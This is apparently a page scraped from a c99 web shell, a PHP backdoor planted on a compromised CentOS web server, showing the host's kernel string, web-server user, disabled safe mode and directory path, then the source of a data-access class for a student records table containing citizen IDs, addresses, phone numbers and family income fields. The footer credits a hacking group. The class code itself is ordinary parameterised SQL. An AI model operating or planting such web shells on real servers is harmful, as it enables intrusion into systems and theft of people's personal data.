!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/models/eregis/   drwxr-xr-x
Free 52 GB of 127.8 GB (40.69%)


Viewing file:     da_rg_StudentDetails.php (11.05 KB)      -rw-r--r--
<?php

include_once("my_model.php");

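/**
 * Data-access object for one row of the rg_StudentDetails table.
 *
 * Each public property mirrors a column of the same name; callers assign the
 * properties and then call insert(), update(), delete() or get_by_key().
 * The row holds personal data (citizen id, addresses, phone numbers, family
 * and income details), so every value reaches the database through bound
 * `?` placeholders and is never concatenated into a statement.
 *
 * NOTE(review): $this->db, $this->load, $this->rg_dbname and row2attribute()
 * are not defined in this class; presumably they come from My_model. Confirm.
 * NOTE(review): $this->rg_dbname is interpolated into the SQL as an identifier
 * and cannot be bound. Confirm it is set from configuration only and never
 * from request data.
 */
class Da_rg_studentdetails extends My_model {

    // PK is sdtStdId
    public $sdtStdId;
    public $sdtOldName;
    public $sdtSex;
    public $sdtCitizenId;
    public $sdtBirthDate;
    public $sdtBloodGroup;
    public $sdtCardExpireDate;
    public $sdtEmail;
    public $sdtWeight;
    public $sdtHeight;
    public $sdtPicturePath;
    public $sdtCanRefund;
    public $sdtOccExamResult;
    public $sdtHomeAddr;
    public $sdtHomePostCode;
    public $sdtHomePhoneNo;
    public $sdtCurrentAddr;
    public $sdtCurrentPostCode;
    public $sdtCurrentPhoneNo;
    public $sdtWorkName;
    public $sdtWorkAddr;
    public $sdtWorkPostCode;
    public $sdtWorkPhoneNo;
    public $sdtWorkPosition;
    public $sdtWorkSalary;
    public $sdtWorkStatus;
    public $sdtFatherName;
    public $sdtFatherSurname;
    public $sdtFatherAddr;
    public $sdtFatherPostCode;
    public $sdtFatherPhoneNo;
    public $sdtFatherOccupation;
    public $sdtFatherStatus;
    public $sdtMotherName;
    public $sdtMotherSurname;
    public $sdtMotherAddr;
    public $sdtMotherPostCode;
    public $sdtMotherPhoneNo;
    public $sdtMotherOccupation;
    public $sdtMotherStatus;
    public $sdtParentName;
    public $sdtParentSurname;
    public $sdtParentRelationship;
    public $sdtParentAddr;
    public $sdtParentPostCode;
    public $sdtParentPhoneNo;
    public $sdtParentMobileNo;
    public $sdtParentEmail;
    public $sdtParentOccupation;
    public $sdtParentIncome;
    public $sdtContactName;
    public $sdtContactAddr;
    public $sdtContactPostCode;
    public $sdtContactPhoneNo;
    public $sdtGraduateAddr;
    public $sdtGraduatePostCode;
    public $sdtGraduatePhoneNo;
    public $sdtPrvIdBirth;
    public $sdtCntId;
    public $sdtNtId;
    public $sdtRlgId;
    public $sdtMsId;
    public $sdtRtId;
    public $sdtHpId;
    public $sdtPfIdParent;
    public $sdtDtIdHome;
    public $sdtApIdHome;
    public $sdtPrvIdHome;
    public $sdtDtIdCurrent;
    public $sdtApIdCurrent;
    public $sdtPrvIdCurrent;
    public $sdtDtIdWork;
    public $sdtApIdWork;
    public $sdtPrvIdWork;
    public $sdtDtIdFather;
    public $sdtApIdFather;
    public $sdtPrvIdFather;
    public $sdtDtIdMother;
    public $sdtApIdMother;
    public $sdtPrvIdMother;
    public $sdtDtIdParent;
    public $sdtApIdParent;
    public $sdtPrvIdParent;
    public $sdtDtIdContact;
    public $sdtApIdContact;
    public $sdtPrvIdContact;
    public $sdtDtIdGraduate;
    public $sdtApIdGraduate;
    public $sdtPrvIdGraduate;
    public $sdtEdgIdPre;

    // Filled by insert() with the value the driver reports via insert_id().
    public $last_insert_id;

    /**
     * Constructor (PHP 4 style, named after the class).
     *
     * NOTE(review): this looks like a CodeIgniter model. There, a TRUE second
     * argument makes load->database() return the connection instead of
     * assigning $this->db, and the return value is discarded here. Confirm
     * that My_model provides $this->db for the 'rg' group.
     */
    function Da_rg_StudentDetails() {
        parent::__construct();
        $this->load->database('rg', TRUE);
    }

    /**
     * Non-key columns of rg_StudentDetails, in the order insert() and update()
     * write them. Keeping one list means the column names, the `?`
     * placeholders and the bound values cannot drift apart.
     *
     * @return array list of column names (each is also a property name)
     */
    private function _sdtDataColumns() {
        return array(
            'sdtOldName', 'sdtSex', 'sdtCitizenId', 'sdtBirthDate', 'sdtBloodGroup',
            'sdtCardExpireDate', 'sdtEmail', 'sdtWeight', 'sdtHeight', 'sdtPicturePath',
            'sdtCanRefund', 'sdtOccExamResult',
            'sdtHomeAddr', 'sdtHomePostCode', 'sdtHomePhoneNo',
            'sdtCurrentAddr', 'sdtCurrentPostCode', 'sdtCurrentPhoneNo',
            'sdtWorkName', 'sdtWorkAddr', 'sdtWorkPostCode', 'sdtWorkPhoneNo',
            'sdtWorkPosition', 'sdtWorkSalary', 'sdtWorkStatus',
            'sdtFatherName', 'sdtFatherSurname', 'sdtFatherAddr', 'sdtFatherPostCode',
            'sdtFatherPhoneNo', 'sdtFatherOccupation', 'sdtFatherStatus',
            'sdtMotherName', 'sdtMotherSurname', 'sdtMotherAddr', 'sdtMotherPostCode',
            'sdtMotherPhoneNo', 'sdtMotherOccupation', 'sdtMotherStatus',
            'sdtParentName', 'sdtParentSurname', 'sdtParentRelationship', 'sdtParentAddr',
            'sdtParentPostCode', 'sdtParentPhoneNo', 'sdtParentMobileNo', 'sdtParentEmail',
            'sdtParentOccupation', 'sdtParentIncome',
            'sdtContactName', 'sdtContactAddr', 'sdtContactPostCode', 'sdtContactPhoneNo',
            'sdtGraduateAddr', 'sdtGraduatePostCode', 'sdtGraduatePhoneNo',
            'sdtPrvIdBirth', 'sdtCntId', 'sdtNtId', 'sdtRlgId', 'sdtMsId', 'sdtRtId',
            'sdtHpId', 'sdtPfIdParent',
            'sdtDtIdHome', 'sdtApIdHome', 'sdtPrvIdHome',
            'sdtDtIdCurrent', 'sdtApIdCurrent', 'sdtPrvIdCurrent',
            'sdtDtIdWork', 'sdtApIdWork', 'sdtPrvIdWork',
            'sdtDtIdFather', 'sdtApIdFather', 'sdtPrvIdFather',
            'sdtDtIdMother', 'sdtApIdMother', 'sdtPrvIdMother',
            'sdtDtIdParent', 'sdtApIdParent', 'sdtPrvIdParent',
            'sdtDtIdContact', 'sdtApIdContact', 'sdtPrvIdContact',
            'sdtDtIdGraduate', 'sdtApIdGraduate', 'sdtPrvIdGraduate',
            'sdtEdgIdPre',
        );
    }

    /**
     * Collects the current property values for the given columns, in order.
     *
     * @param array $columns column/property names
     * @return array values to bind, one per column
     */
    private function _sdtBindValues($columns) {
        $values = array();
        foreach ($columns as $column) {
            $values[] = $this->$column;
        }
        return $values;
    }

    /**
     * Inserts the current property values as a new row and records the
     * driver's insert id in $this->last_insert_id.
     */
    function insert() {
        // if there is no auto_increment field, please remove it
        $columns = array_merge(array('sdtStdId'), $this->_sdtDataColumns());
        // One placeholder per column, so the counts always match.
        $placeholders = implode(', ', array_fill(0, count($columns), '?'));
        $sql = "INSERT INTO $this->rg_dbname.rg_StudentDetails (" . implode(', ', $columns) . ")
                VALUES($placeholders)";
        $this->db->query($sql, $this->_sdtBindValues($columns));
        $this->last_insert_id = $this->db->insert_id();
    }

    /**
     * Writes every non-key property back to the row whose sdtStdId matches
     * $this->sdtStdId.
     */
    function update() {
        // if there is no primary key, please remove WHERE clause.
        $columns = $this->_sdtDataColumns();
        $assignments = array();
        foreach ($columns as $column) {
            $assignments[] = $column . '=?';
        }
        $sql = "UPDATE $this->rg_dbname.rg_StudentDetails
                SET    " . implode(', ', $assignments) . "
                WHERE sdtStdId=?";
        $values = $this->_sdtBindValues($columns);
        // The key is bound last, matching the trailing WHERE placeholder.
        $values[] = $this->sdtStdId;
        $this->db->query($sql, $values);
    }

    /**
     * Deletes the row whose sdtStdId matches $this->sdtStdId.
     */
    function delete() {
        // if there is no primary key, please remove WHERE clause.
        $sql = "DELETE FROM $this->rg_dbname.rg_StudentDetails
                WHERE sdtStdId=?";
        $this->db->query($sql, array($this->sdtStdId));
    }

    /**
     * Looks up the row for $this->sdtStdId.
     * You have to assign the primary key value before calling this function.
     *
     * @param bool $withSetAttributeValue when true, the first result row is
     *        passed to row2attribute() and nothing is returned; when false,
     *        the query result object is returned untouched
     * @return mixed the query result, or nothing when $withSetAttributeValue is true
     */
    function get_by_key($withSetAttributeValue=FALSE) {
        $sql = "SELECT *
                FROM $this->rg_dbname.rg_StudentDetails
                WHERE sdtStdId=?";
        $query = $this->db->query($sql, array($this->sdtStdId));
        if ( $withSetAttributeValue ) {
            $this->row2attribute( $query->row() );
        } else {
            return $query;
        }
    }

    /**
     * Returns the insert id currently reported by the database driver.
     */
    function last_insert_id() {
        return $this->db->insert_id();
    }

    /**
     * Sets sdtCitizenId on the row identified by $sdtStdId.
     *
     * Both arguments are bound as parameters rather than concatenated into
     * the statement, so their content cannot change the statement's
     * structure. The statement is executed once.
     *
     * @param mixed $sdtStdId   primary key of the row to change
     * @param mixed $app_idcard new citizen id value
     * @return mixed whatever $this->db->query() returns for the UPDATE
     */
    public function UpdateSdtCitizen($sdtStdId,$app_idcard){
        $sql = "UPDATE $this->rg_dbname.`rg_StudentDetails` SET `sdtCitizenId` = ? WHERE `sdtStdId` = ?";
        return $this->db->query($sql, array($app_idcard, $sdtStdId));
    }
}     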
//=== end class Da_rg_studentdetails
?>

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.008 ]--